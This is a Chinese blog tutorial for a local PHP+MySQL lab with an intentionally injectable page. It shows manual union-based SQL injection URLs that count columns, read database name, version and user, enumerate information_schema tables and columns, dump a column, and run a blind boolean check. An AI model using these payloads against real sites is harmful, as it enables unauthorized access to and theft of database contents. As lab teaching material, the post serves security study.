php+mysql注入环境搭建

最新推荐文章于 2022-06-08 13:13:53 发布
最新推荐文章于 2022-06-08 13:13:53 发布
阅读量809 收藏 1
点赞数
分类专栏: web攻防

php+mysql注入环境搭建需要资料如下:

链接:http://pan.baidu.com/s/1kV746Dx 密码:026d

1.安装phpmystudy

自定义安装好phpmystudy,启动(运行phpmystudy)

 

2.编程一个注入页面(下载好的sql.php)

在phpmystudy安装路径下WWW目录创建一下文件夹test,

然后把下载好的sql.php复制一份到test下。

 

 

3.数据接受(创建数据库,注入传递参数到数据库)

http://127.0.0.1/phpmyadmin/           用户名密码都是root

创建一个表列数据,接受传递参数查询数据库。(我这里直接下数据库test下,创建一张biao表)

 

  1. CREATE TABLE IF NOT EXISTS `biao` (
  2.   `id` int(10) NOT NULL,
  3.   `title` varchar(1000) NOT NULL,
  4.   `text` varchar(1000) NOT NULL
  5. ) ENGINE=MyISAM DEFAULT CHARSET=GBK;
  6.  
  7. INSERT INTO `biao` (`id`, `title`, `text`) VALUES
  8. (1,'渗透注入','本地搭建注入环境')

 

好了,到此php+mysql注入环境搭建完成。

 

测试:

 

传递的参数?i=1

http://127.0.0.1/test/sql.php?i=1

 

 

 

第一步:判断环境,寻找注入点

确定注入点 : 
数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 
 

 

 

 

猜解当前字段数:http://127.0.0.1/test/sql.php?i=1 and  1=1  order by 3  (3正常,4不正常,字段数为3)

WARMING: order by 语句仅用于猜解当前查询语句查询的字段数(即if 为 * ,则查询所有。为name,则只查询一个name字段)

 

 

输出数据类容判断字段位置:http://127.0.0.1/test/sql.php?i=1 and 1=1  union select 1,2,3(字段个数)

注:union查询,必须两次查询的结果格式相同;

注:mysql注入不需要猜测表名5.*版本以上,

因为存在MYSQL-INFORMATION_SCHEMA信息数据库,即元数据,里面含有数据库的基本信息;

 

 

获取数据库信息:

 

 

数据库名 database()

数据库版本 version()

数据库用户 user()

操作系统 @@version_compile_os

 

 

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select database(),version(),user()

 

得到数据库为test,用户为root,数据库版本5.5.47

 

查询test(使用小葵多功能转换工具得到hex编码)下的所有表名信息:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select table_name,2,3 from information_schema.tables where table_schema=0x74657374

注:mysql注入不需要猜测表名5.*版本以上,

因为存在MYSQL-INFORMATION_SCHEMA信息数据库,即元数据,里面含有数据库的基本信息;

 

 

查询biao(使用小葵多功能转换工具得到hex编码)下的所有列名信息:

 

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select column_name,2,3 from information_schema.columns where table_name=0x6269616F(限制表名,因为存在多个表)

 

 

 

直接获取biao表名下的title列名的数据:

http://127.0.0.1/test/sql.php?i=1 and 1=1  union select title,2,3 from test.biao

 

http://127.0.0.1/test/sql.php?i=1 and left((select table_name from information_schema.tables where table_schema=database()limit 0,1),1)='b'

 

 

 

总结:应该依次查询出字端数然后以此联合查询库名、表名(nformation_schema.tables)、字段名(information_schema.columns)从information_schema元数据中,但因存在多表、多库,必须限定查询;其次在根据表名查询相关字段下的信息;

于尘世中迷途小书童
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入环境搭建_SQL注入系列之环境搭建(二)----PHP+Mysql注入环境搭建
weixin_32702015的博客
02-07 98
一、手写一个带sql注入的页面php+mysql注入页面编写步骤1.接受参数2.连接数据库3.组合sql语句4.执行sql语句并返回显示新建一个sqltest.php的文件、并添加以下代码//fendo数据库root用户连接mysql数据库,操作user表$id= $_GET['x'];//接受get传递的参数名x的值并赋值给变量id$conn = mysql_connect('127.0.0.1...
搭建mysql注入_常见的sql注入环境搭建
weixin_28943105的博客
02-05 456
常见的sql注入环境搭建By : Mirror王宇阳Time:2020-01-06PHP+MySQL摘要$conn = new mysqli('数据库服务器','username','password','database');$conn = mysqli_connect('数据库服务器','username','password','database');// 参数内容可以单独设置为一个变量引用...
mysql注入环境
01-16
包含mysql-injection.pdf linux/windos环境搭建.pdf 以及 sqli-labs-master测试环境
PHP+MySQL注入
Jim的博客
08-15 542
一.访问文件系统 1.读文件 MySQL允许使用load data infile和load_file命令将文本文件读到数据库中。 首先创建一个文本文件users.txt 创建数据表:create table authors (fname char(20), sname char(20), email char(100), flag int); 导入数据库:load data infile
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
php+mysql注入环境搭建及测试(上)-附件资源
03-05
php+mysql注入环境搭建及测试(上)-附件资源
Php+Mysql网页版通用查询系统 v201911
08-23
- 安全性高:通过PHPMySQL的安全特性,可以有效防止SQL注入等安全风险。 - 易于维护:使用标准的技术栈,后期维护和升级相对简单。 综上所述,《PHP+MySQL网页版通用查询系统 v201911》凭借其灵活的架构、强大...
安卓一键搭建php环境和手机mysql注入演示
08-12
php的安装和mysql注入演示,什么是mysql注入,怎么搭建php环境
PHP+MySQL搭建聊天室
03-04
PHP+MySQL搭建聊天室详解】 在网页开发中,PHPMySQL是常用的技术组合,尤其在构建动态交互式网站如聊天室时。MySQL以其出色的并发处理能力和快速响应时间,成为高性能数据库系统的首选,而PHP作为服务器端脚本...
PHP+Mysql 带SQL注入源码 下载
01-01
PHP+Mysql 带SQL注入源码、下载解压部署到环境中去就行了。
PHP+MYSQL网站注入扫描工具 修正版
10-05
PHP+MYSQL网站注入扫描工具,针对类似夜猫文章下载系统比较有效,界面是仿教程的hdsi中的PHP注入模块写的,实现原理是参考angel的SQL Injection with MYSQL写的,网上有很多,不再细说。修正了以下Bug,内容:1。扫描网站表段最大字段数由30改为50。2。猜解列名和猜解后台管理路径的停止按钮不起作用,现已修正
PHP注入工具超强工具包
01-03
PHP注入工具超强工具包 PHP-Mysql注射分析器
PHPmysql(手工注入
10-12
资源分享者,资源爱好者,我是浪杉,点我资料关注,每日不定时分享全网优质源码!
MySQL注入 搭建安装
wokeaia的博客
09-22 93
准备工作: Sqli-labs项目地址—Github获取:https://github.com/Audi-1/sqli-labs 软件:phpstudy 安装所需的环境: apache+mysql+php 放到phpstudy的www目录下。 phpstudy\WWW\sqli-labs\sql-connections 目录下的db-creds.inc文件,以记事本方式打开 修改user、password 创建网站、设置域名、端口修改、设置php5.4.45版本(太高不兼容...
PHPMySQL 注入
freeking101的博客
07-26 4390
因为需要了解下 SQL 注入,就使用 PHP 自己写了一个只有一个网页的网站测试下,现在记录下过程。。。 直接使用的 KALI系统 (KALI官网:https://www.kali.org/)。KALI 是一个渗透测试的神器。集成了好多黑客工具,当然也就集成了许多开发所需的环境。
php+mysql手工注入教程
qq_40083102的博客
11-14 503
php+mysql手工注入教程 http://tieba.baidu.com/p/3723202169
环境搭建MySQL
zsm030616的博客
06-08 184
1.去官网搜索MySQL的安装包,下载并解压到文件夹2.复制改变my.ini文件进到文件夹中,找到my.ini文件将my.ini中这两个路径,改变为当前文件夹的路径 3.安装MySQL服务 mysqld -install注意:在进入cmd时,需要在C盘Window:/system32下面的cmd中进入 4.初始化MySQL mysqld --initialize --console 5.启动MySQL服务 net start mysql输入 net start mysql即可当发生错误时
对Apache+PHP+MySQL环境的SQL注入攻击
最新发布
06-06
在攻击实现部分,你可以选择使用SQL注入攻击手段,根据前期作业的准备,对自己搭建的Apache+PHP+MySQL环境进行实施,模拟SQL注入攻击的过程。可以先进行信息搜集,了解网站的结构与后台数据库的相关信息,然后确定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值